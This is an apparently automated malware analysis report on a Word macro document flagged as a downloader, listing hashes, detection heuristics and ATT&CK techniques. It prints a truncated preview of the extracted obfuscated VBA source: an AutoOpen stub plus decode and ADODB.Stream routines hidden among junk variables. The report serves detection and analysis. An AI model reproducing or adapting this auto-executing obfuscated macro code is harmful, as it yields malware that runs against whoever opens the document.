Office (OLE) malware analysis — malicious · 7d3a7e7ea90ba8dc

MALICIOUS

Office (OLE)

161.5 KB Created: 2017-05-04 16:42:00 Authoring application: Microsoft Office Word First seen: 2017-05-13

MD5: 3a8552d676e08703f8201a52889f8802 SHA-1: d4719b7a118eb757ce7214b926d4507a9319fbaf SHA-256: 7d3a7e7ea90ba8dc0fe9761ac4fa5e7017373fe8f0c0b8bfc7e3c70e9c98f98c

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and uses CreateObject and Shell() calls, indicating an attempt to execute arbitrary code. This is consistent with a downloader or droppper malware designed to fetch and run a second-stage payload. The ClamAV detection also confirms its malicious nature.

Heuristics 8

ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16550 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16550 bytes
SHA-256: `4fd19edf82cb3e8f53731aa76dff233e2465e8035a47721d55b1b6cca475da5b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub AutoOpen() Dim DXKcs As Byte DXKcs = 223 Dim drxoT As Boolean drxoT = False Dim OzQdX As Byte OzQdX = 132 Dim aCNED As Single aCNED = Val(38096.700924199) Dim KJvn6eqr KJvn6eqr = LCase(iTisf98) ao3CG7eT End Sub Attribute VB_Name = "Module2" Public Function gAuRQ(ByVal I0b5iIS) Dim mUoTIw As Double mUoTIw = Val(32502.763272077) Dim VBtmLa0 As Single VBtmLa0 = Sgn(14353.053151931) Dim zl9eX Dim u8D4ZvPAa Dim jiQw48gav As Long jiQw48gav = -2003272256 Dim bJqpnUBax bJqpnUBax = Len(cQOTBfn) Dim JnfPY As Integer JnfPY = 10733 Dim kge5LvCN As Long kge5LvCN = Sgn(-479446318) Set zl9eX = CreateObject(oBJxv) Dim qoLpzi As Integer qoLpzi = -22503 Dim zQTRiou As Byte zQTRiou = 111 Dim Vi71TFm9 As Single Vi71TFm9 = 19600.033381308 Set u8D4ZvPAa = zl9eX.CreateElement(IVcEO2l6) Dim FQDFZlkh As Double FQDFZlkh = Sgn(61160.349166364) Dim vJvytm As Single vJvytm = Int(18487.402532009) Dim mB0xkD4 As Single mB0xkD4 = 36055.464712362 With u8D4ZvPAa Dim ZcQs8TqW As Integer ZcQs8TqW = Sgn(30624) Dim qciD6d As Boolean qciD6d = True u8D4ZvPAa.DataType = "bin." & IVcEO2l6 Dim NT9Wf4V As Long NT9Wf4V = Sgn(-459281258) Dim JI1jn4urU As Boolean JI1jn4urU = False u8D4ZvPAa.Text = I0b5iIS End With Dim OHPeCAso As Single OHPeCAso = Sgn(16163.419619824) Dim JIy8CgA As Single JIy8CgA = Int(56208.815364551) Dim YMNiz YMNiz = Val(UXuMyt8Ob) Dim hiGZQ7pj As Byte hiGZQ7pj = 242 Dim sS2dpc1Te As Long sS2dpc1Te = 0 gAuRQ = qRdoV(u8D4ZvPAa.nodeTypedValue) Dim qvrWaQ As Integer qvrWaQ = Sgn(10387) Dim Kef2D9B As Long Kef2D9B = Sgn(0) Dim Yp6gXziR As Single Yp6gXziR = 29579.491087246 Set u8D4ZvPAa = Nothing Set zl9eX = Nothing End Function Function qRdoV(Binary) Dim RtDxhTcs As Integer RtDxhTcs = Sgn(-14625) Dim zZ3HxTO As Double zZ3HxTO = Int(6285.1011814613) Const Bvg2N = 2 Const kBF8v = 1 Dim b7ODQ3 As Integer b7ODQ3 = Sgn(17197) Dim UdlwjH As String UdlwjH = AscB("E") Dim CmcfyFl As Single CmcfyFl = 43735.14494797 Dim sVA8f Dim H0bwSm As Single H0bwSm = Round(55704.681716492) Dim fmRDx fmRDx = Val("m") Dim GxZv19s As Long GxZv19s = -1876602424 Dim Xt5AZekB As Double Xt5AZekB = Sgn(20667.044930352) Dim RshtZxF As String RshtZxF = AscB("J") Dim OxV0kCT As Long OxV0kCT = 0 Set sVA8f = CreateObject("adodb.stream") Dim PfT8Mb5 As Integer PfT8Mb5 = Sgn(-9952) Dim o8FXdlj3 As Integer o8FXdlj3 = Sgn(-13948) Dim Be0n5bPrS As String Be0n5bPrS = Val("8") With sVA8f Dim jgOnlQVpJ As Boolean jgOnlQVpJ = True Dim cgheW As Byte cgheW = 133 Dim i2Ef90XiW As Single i2Ef90XiW = 54552.535355803 .Type = kBF8v Dim B3Sn7gcm As Single B3Sn7gcm = Sgn(37415.222443235) Dim khP0CbiVI As Boolean khP0CbiVI = True Dim AB6gF As Single AB6gF = Fix(47611.159975582) Dim vfDUEAl vfDUEAl = Trim(lfFO8uIM) Dim y6xnfP9 As Single y6xnfP9 = Sgn(8801.0150691247) .Open Dim z9CSzL z9CSzL = Len(ZngbJQ62I) Dim ZArsw4Fk0 As Byte ZArsw4Fk0 = 250 Dim pu3bv As Integer pu3bv = Sgn(-15340) Dim ucCYVoD ucCYVoD = Len(rOZ1ugmlD) Dim L0doNbw56 As Boolean L0doNbw56 = True .Write Binary Dim BwY6zlp BwY6zlp = Val("h") Dim u7dov25 u7dov25 = Val(Pevcm) .Position = 0 Dim EtNkVjuYb As Byte EtNkVjuYb = 157 Dim tvHqDX As String tvHqDX = AscW("F") Dim aSoObc As Boolean aSoObc = True .Type = Bvg2N Dim pvNUy As Byte pvNUy = 131 Dim p1vU5ZxrT As Byte p1vU5ZxrT = 199 Dim cFb4MNtEx cFb4MNtEx = "2" Dim pw1ZXkxtz As Single pw1ZXkxtz = Sgn(30880.240866816) Dim Gye8v5sjJ Gye8v5sjJ = Len(bmGPOM) Dim u2j6hO5 As Boolean u2j6hO5 = True Dim xU6KDP As Single xU6KDP = Sgn(17094.792335229) .CharSet = "ascii" Dim p2pKoJzPL As Long p2pKoJzPL = 0 Dim CYMhtXVj1 As Long CYMhtXVj1 = Sgn(0) Dim e2Ko3mv As Boolean e2Ko3mv = True Dim suvhY42p As S ... (truncated)

SHA-256: 4fd19edf82cb3e8f53731aa76dff233e2465e8035a47721d55b1b6cca475da5b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()

Dim DXKcs As Byte
DXKcs = 223
Dim drxoT As Boolean
drxoT = False
Dim OzQdX As Byte
OzQdX = 132
Dim aCNED As Single
aCNED = Val(38096.700924199)
Dim KJvn6eqr
KJvn6eqr = LCase(iTisf98)
ao3CG7eT
End Sub

Attribute VB_Name = "Module2"
Public Function gAuRQ(ByVal I0b5iIS)
Dim mUoTIw As Double
mUoTIw = Val(32502.763272077)
Dim VBtmLa0 As Single
VBtmLa0 = Sgn(14353.053151931)
Dim zl9eX
Dim u8D4ZvPAa

Dim jiQw48gav As Long
jiQw48gav = -2003272256
Dim bJqpnUBax
bJqpnUBax = Len(cQOTBfn)

Dim JnfPY As Integer
JnfPY = 10733
Dim kge5LvCN As Long
kge5LvCN = Sgn(-479446318)
Set zl9eX = CreateObject(oBJxv)

Dim qoLpzi As Integer
qoLpzi = -22503
Dim zQTRiou As Byte
zQTRiou = 111
Dim Vi71TFm9 As Single
Vi71TFm9 = 19600.033381308
Set u8D4ZvPAa = zl9eX.CreateElement(IVcEO2l6)
Dim FQDFZlkh As Double
FQDFZlkh = Sgn(61160.349166364)
Dim vJvytm As Single
vJvytm = Int(18487.402532009)
Dim mB0xkD4 As Single
mB0xkD4 = 36055.464712362
With u8D4ZvPAa
Dim ZcQs8TqW As Integer
ZcQs8TqW = Sgn(30624)
Dim qciD6d As Boolean
qciD6d = True
u8D4ZvPAa.DataType = "bin." & IVcEO2l6
Dim NT9Wf4V As Long
NT9Wf4V = Sgn(-459281258)
Dim JI1jn4urU As Boolean
JI1jn4urU = False
u8D4ZvPAa.Text = I0b5iIS
End With
Dim OHPeCAso As Single
OHPeCAso = Sgn(16163.419619824)
Dim JIy8CgA As Single
JIy8CgA = Int(56208.815364551)
Dim YMNiz
YMNiz = Val(UXuMyt8Ob)
Dim hiGZQ7pj As Byte
hiGZQ7pj = 242
Dim sS2dpc1Te As Long
sS2dpc1Te = 0
gAuRQ = qRdoV(u8D4ZvPAa.nodeTypedValue)
Dim qvrWaQ As Integer
qvrWaQ = Sgn(10387)
Dim Kef2D9B As Long
Kef2D9B = Sgn(0)
Dim Yp6gXziR As Single
Yp6gXziR = 29579.491087246
Set u8D4ZvPAa = Nothing
Set zl9eX = Nothing
End Function
Function qRdoV(Binary)
Dim RtDxhTcs As Integer
RtDxhTcs = Sgn(-14625)
Dim zZ3HxTO As Double
zZ3HxTO = Int(6285.1011814613)
Const Bvg2N = 2
Const kBF8v = 1
Dim b7ODQ3 As Integer
b7ODQ3 = Sgn(17197)
Dim UdlwjH As String
UdlwjH = AscB("E")
Dim CmcfyFl As Single
CmcfyFl = 43735.14494797
Dim sVA8f
Dim H0bwSm As Single
H0bwSm = Round(55704.681716492)
Dim fmRDx
fmRDx = Val("m")
Dim GxZv19s As Long
GxZv19s = -1876602424
Dim Xt5AZekB As Double
Xt5AZekB = Sgn(20667.044930352)
Dim RshtZxF As String
RshtZxF = AscB("J")
Dim OxV0kCT As Long
OxV0kCT = 0
Set sVA8f = CreateObject("adodb.stream")
Dim PfT8Mb5 As Integer
PfT8Mb5 = Sgn(-9952)
Dim o8FXdlj3 As Integer
o8FXdlj3 = Sgn(-13948)
Dim Be0n5bPrS As String
Be0n5bPrS = Val("8")
With sVA8f

Dim jgOnlQVpJ As Boolean
jgOnlQVpJ = True
Dim cgheW As Byte
cgheW = 133
Dim i2Ef90XiW As Single
i2Ef90XiW = 54552.535355803
.Type = kBF8v
Dim B3Sn7gcm As Single
B3Sn7gcm = Sgn(37415.222443235)
Dim khP0CbiVI As Boolean
khP0CbiVI = True
Dim AB6gF As Single
AB6gF = Fix(47611.159975582)
Dim vfDUEAl
vfDUEAl = Trim(lfFO8uIM)
Dim y6xnfP9 As Single
y6xnfP9 = Sgn(8801.0150691247)
.Open
Dim z9CSzL
z9CSzL = Len(ZngbJQ62I)
Dim ZArsw4Fk0 As Byte
ZArsw4Fk0 = 250
Dim pu3bv As Integer
pu3bv = Sgn(-15340)
Dim ucCYVoD
ucCYVoD = Len(rOZ1ugmlD)
Dim L0doNbw56 As Boolean
L0doNbw56 = True
.Write Binary
Dim BwY6zlp
BwY6zlp = Val("h")
Dim u7dov25
u7dov25 = Val(Pevcm)
.Position = 0

Dim EtNkVjuYb As Byte
EtNkVjuYb = 157
Dim tvHqDX As String
tvHqDX = AscW("F")
Dim aSoObc As Boolean
aSoObc = True
.Type = Bvg2N

Dim pvNUy As Byte
pvNUy = 131
Dim p1vU5ZxrT As Byte
p1vU5ZxrT = 199
Dim cFb4MNtEx
cFb4MNtEx = "2"
Dim pw1ZXkxtz As Single
pw1ZXkxtz = Sgn(30880.240866816)
Dim Gye8v5sjJ
Gye8v5sjJ = Len(bmGPOM)

Dim u2j6hO5 As Boolean
u2j6hO5 = True
Dim xU6KDP As Single
xU6KDP = Sgn(17094.792335229)
.CharSet = "ascii"

Dim p2pKoJzPL As Long
p2pKoJzPL = 0
Dim CYMhtXVj1 As Long
CYMhtXVj1 = Sgn(0)
Dim e2Ko3mv As Boolean
e2Ko3mv = True
Dim suvhY42p As S
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.